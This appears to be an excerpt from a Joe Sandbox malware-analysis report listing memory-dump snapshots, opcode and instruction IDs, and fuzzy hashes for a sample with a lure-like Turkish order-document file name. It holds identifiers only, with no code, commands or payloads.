                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f80000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 750dd7b392ec1aa180781b7361deecea19bfbd8ed6d091f38d3ac5cd18384928
                                            • Instruction ID: 0abb0aa4729e4033b61d34da526e7193b50b13dffbe18330cadce170182f060a
                                            • Opcode Fuzzy Hash: 750dd7b392ec1aa180781b7361deecea19bfbd8ed6d091f38d3ac5cd18384928
                                            • Instruction Fuzzy Hash: 56612971E00648CFDB08DF6AE85069ABBF3FFC8310F14C12AD406AB264EB7559169F52
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7bdd5b32cb4f628e4fcdeed8119e07665bbf25f4bdea75532844c1bfdc972aee
                                            • Instruction ID: fc57b2b4d251bf6dd7d8504548fe17f200f7bdcc24e312f2a6216c04dc276f88
                                            • Opcode Fuzzy Hash: 7bdd5b32cb4f628e4fcdeed8119e07665bbf25f4bdea75532844c1bfdc972aee
                                            • Instruction Fuzzy Hash: 1B710674E042299FDB14CFA9C990AAEFBB2FF88300F1491A9D809A7355D7319D81CF61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445094076.0000000009F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f80000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: de4ca6b8c940acd3f65d10a2eeb25776b2aae59a7bc3c64214bf937709d11616
                                            • Instruction ID: 65170d6c926b918ed96c157e2d0a738d35a9cd52fc633fead1c6983d985f0f2a
                                            • Opcode Fuzzy Hash: de4ca6b8c940acd3f65d10a2eeb25776b2aae59a7bc3c64214bf937709d11616
                                            • Instruction Fuzzy Hash: 3A610971E00648CFDB48DF6AE85069ABBF3FFC8310F14C12AD405AB264EB7559169F92
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445094076.0000000009F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f80000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a531cda9b124be87fb21c5de1d7fc76ebf1e812a5ff510e3c3ded0bf9f0691f9
                                            • Instruction ID: d974b45c50473b07112b8771d3f30031b177bc2d58f03905594444c07e144f43
                                            • Opcode Fuzzy Hash: a531cda9b124be87fb21c5de1d7fc76ebf1e812a5ff510e3c3ded0bf9f0691f9
                                            • Instruction Fuzzy Hash: A55105B4E102198FDB14DFA9C5815AEBBF2FF89305F24816AD418AB316D7319D42CFA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ce47a0624d022d9fe6f98752992f97d67a4fe59bfb9cb9b4b9ce54ec835b74eb
                                            • Instruction ID: 374bcb29134510cbdd94a07ad1cd86fe288ac8f5e95f58b6de9b303ece060377
                                            • Opcode Fuzzy Hash: ce47a0624d022d9fe6f98752992f97d67a4fe59bfb9cb9b4b9ce54ec835b74eb
                                            • Instruction Fuzzy Hash: F141E7B0E0460A9BCB48CFA9C5815AEFBF3FB89300F64C569D406B7244D7349A45CBA4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d3b9daf97da701f8704efad62405c92839c84728f70d44bed3b87e094b669d63
                                            • Instruction ID: a2a608b0f66ed8c588b04cfb897ee3023b9eecac0936ef4353ed4a22f34647f4
                                            • Opcode Fuzzy Hash: d3b9daf97da701f8704efad62405c92839c84728f70d44bed3b87e094b669d63
                                            • Instruction Fuzzy Hash: 9531EAB1E016189BEB58CFABD85079EFBF7BFC9200F04C0BAD518A6254EB304A558F51
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 47f3813726c7fcbe821f6c968d1c9d635b547aabdfbcbe62b6af50b177bffe8d
                                            • Instruction ID: bce8f39954fc6c7511faa9e23eb6a94f3168df9f6d9b8bbe4ee8374c520c3009
                                            • Opcode Fuzzy Hash: 47f3813726c7fcbe821f6c968d1c9d635b547aabdfbcbe62b6af50b177bffe8d
                                            • Instruction Fuzzy Hash: 31314C71E016598FDB18CFBAD884A9EFBB3AFC9200F18C0AAD404AB255D7304902CF51
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2094b84567ac3f1c17cee411e60fe632f3df4b89f7dbfe2758869646aedadd71
                                            • Instruction ID: edc386ab7ab5aa7a5925ff7ebabd9a732b3a988910bf09bea3e4c8ec5dc185fc
                                            • Opcode Fuzzy Hash: 2094b84567ac3f1c17cee411e60fe632f3df4b89f7dbfe2758869646aedadd71
                                            • Instruction Fuzzy Hash: 9A2106B1E116199BDB18CFAAD9406EEFBF7BFC9210F14C13AD408A7254EB304A018B51
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1631039929.0000000001880000.00000040.00000800.00020000.00000000.sdmp, Offset: 01880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_1880000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1ce8a0040f127c01818a23a30b9cd607cf70e5258e839dd77355e116b53eaca5
                                            • Instruction ID: 934fd90622d964db9d13f1c5aac272dba4c29f51594cb906ff7a90100c69e683
                                            • Opcode Fuzzy Hash: 1ce8a0040f127c01818a23a30b9cd607cf70e5258e839dd77355e116b53eaca5
                                            • Instruction Fuzzy Hash: 50F1F33190B3D5CFD7639F3C885069ABFB1AF5B614B1844EEC881DB227C6354A1AC762
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1631039929.0000000001880000.00000040.00000800.00020000.00000000.sdmp, Offset: 01880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_1880000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a28cc161d0c1f52e45c5cd0b74cd2dbb8a9fc3a6618cc0df7e307d0ef0e847f1
                                            • Instruction ID: 53100ea6817c53a760e2fb181d6b828502c7724adc2b52bd72aee6c1ae9496a2
                                            • Opcode Fuzzy Hash: a28cc161d0c1f52e45c5cd0b74cd2dbb8a9fc3a6618cc0df7e307d0ef0e847f1
                                            • Instruction Fuzzy Hash: 89B1E33250B7C1DFD7679F388896626BFB0AF5721431C04DEC882CF22BC6298919C756
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1631039929.0000000001880000.00000040.00000800.00020000.00000000.sdmp, Offset: 01880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_1880000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3f0fa583f34503df4f04cb7e214b54c84411861e8f62bd52a5f0b5127989a543
                                            • Instruction ID: d2f57b40f80f9facb344faef7e0c82e207d0b10b22244d8fe1b0b7ee189fe805
                                            • Opcode Fuzzy Hash: 3f0fa583f34503df4f04cb7e214b54c84411861e8f62bd52a5f0b5127989a543
                                            • Instruction Fuzzy Hash: 9A91B335B04219DFDB58ABB5985437FBBA7BFC8700B15956EE402E7388CE3589028792
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1631039929.0000000001880000.00000040.00000800.00020000.00000000.sdmp, Offset: 01880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_1880000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 523f382df66524fa2aa42dc6f7fcf5498abe21d82efe295aff6b37c21fed9d77
                                            • Instruction ID: 07aac46501b4fe84550d04c857986f6a5b749575b68066dcc90c666b75b1125f
                                            • Opcode Fuzzy Hash: 523f382df66524fa2aa42dc6f7fcf5498abe21d82efe295aff6b37c21fed9d77
                                            • Instruction Fuzzy Hash: 3052EA78A01319CFDB64EF68ED98A9DBBB2FB88301F1051A5E809A7354DB345E81CF51
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1631039929.0000000001880000.00000040.00000800.00020000.00000000.sdmp, Offset: 01880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_1880000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f9b2297d3c034ff84248a6d9a34af001ffeb3904ed61a6a028bacfd7cd067e64
                                            • Instruction ID: 76880d178ee67feef3a3be08702ec48f13679c057227851d646f720ed81fcdea
                                            • Opcode Fuzzy Hash: f9b2297d3c034ff84248a6d9a34af001ffeb3904ed61a6a028bacfd7cd067e64
                                            • Instruction Fuzzy Hash: 7552DA78A01319CFDB64EF68ED98A9DBBB2FB88301F1051A5E809A7354DB345E81CF51
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1631039929.0000000001880000.00000040.00000800.00020000.00000000.sdmp, Offset: 01880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_1880000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d13388f5a7fc60d79411df6493b7bb4f14e9b6d408c76d051f574f0933003d40
                                            • Instruction ID: b40b5838f205d8402c3a6b05e0c088199ee1cd4c35defe76cfef43e953be44a9
                                            • Opcode Fuzzy Hash: d13388f5a7fc60d79411df6493b7bb4f14e9b6d408c76d051f574f0933003d40
                                            • Instruction Fuzzy Hash: 44313470D093498FDB01EFA8D8846ADBFF5FB4A305F0041AAC405AB265EB340A45CBA2
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1631039929.0000000001880000.00000040.00000800.00020000.00000000.sdmp, Offset: 01880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_1880000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9511826106efb300cc662e9cba0b411734fc57058b4f6915267c3004dc8a19be
                                            • Instruction ID: 0122f14d966b67e0e224d9d3b818f904080483c4ad0768c770ec3acc5a9b5a71
                                            • Opcode Fuzzy Hash: 9511826106efb300cc662e9cba0b411734fc57058b4f6915267c3004dc8a19be
                                            • Instruction Fuzzy Hash: A821A475A00106DFCB15EF28D840AAE77A6EB9D3A0B10C159E809DB344DB31EE42CBD1
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1631039929.0000000001880000.00000040.00000800.00020000.00000000.sdmp, Offset: 01880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_1880000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 905aceba2bb32fcb32d1be4adf043f45f34d3560d848c4fbbbd122ac1454f472
                                            • Instruction ID: f1b699373d8835e09ac15a84f6522548896371991aa6d35a42b4718be66242f4
                                            • Opcode Fuzzy Hash: 905aceba2bb32fcb32d1be4adf043f45f34d3560d848c4fbbbd122ac1454f472
                                            • Instruction Fuzzy Hash: 9621EFB4D0520ACFCB11EFA9D8845EDBBF0FF0A305F10516AD805B6224EB345A85CBA1
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1631039929.0000000001880000.00000040.00000800.00020000.00000000.sdmp, Offset: 01880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_1880000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d0ee50e1fe37d498307f35528a1f899e1f5b8f2e074b437c4d33383a84d61ef1
                                            • Instruction ID: 9e0e48380fd67eeb5374682aabae684d9030b0403f88f9c779d4966618ab9f21
                                            • Opcode Fuzzy Hash: d0ee50e1fe37d498307f35528a1f899e1f5b8f2e074b437c4d33383a84d61ef1
                                            • Instruction Fuzzy Hash: 14E08676E54766CFCB01E7E0EC440EEBB34AED6212B58465BC06577190EB302658C792
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1631039929.0000000001880000.00000040.00000800.00020000.00000000.sdmp, Offset: 01880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_1880000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 69decf3e33bf860b7044ad0ff44bbd2f2bf3158a815e25f311a9cfd660212444
                                            • Instruction ID: 95853cd4a34060b04074003491279439ef00b1d81410583e0b290ca678964f17
                                            • Opcode Fuzzy Hash: 69decf3e33bf860b7044ad0ff44bbd2f2bf3158a815e25f311a9cfd660212444
                                            • Instruction Fuzzy Hash: 15D05B31D2022B97CB10E7A5DC044EFF738EED5262B504626D51537140FB712659C6E1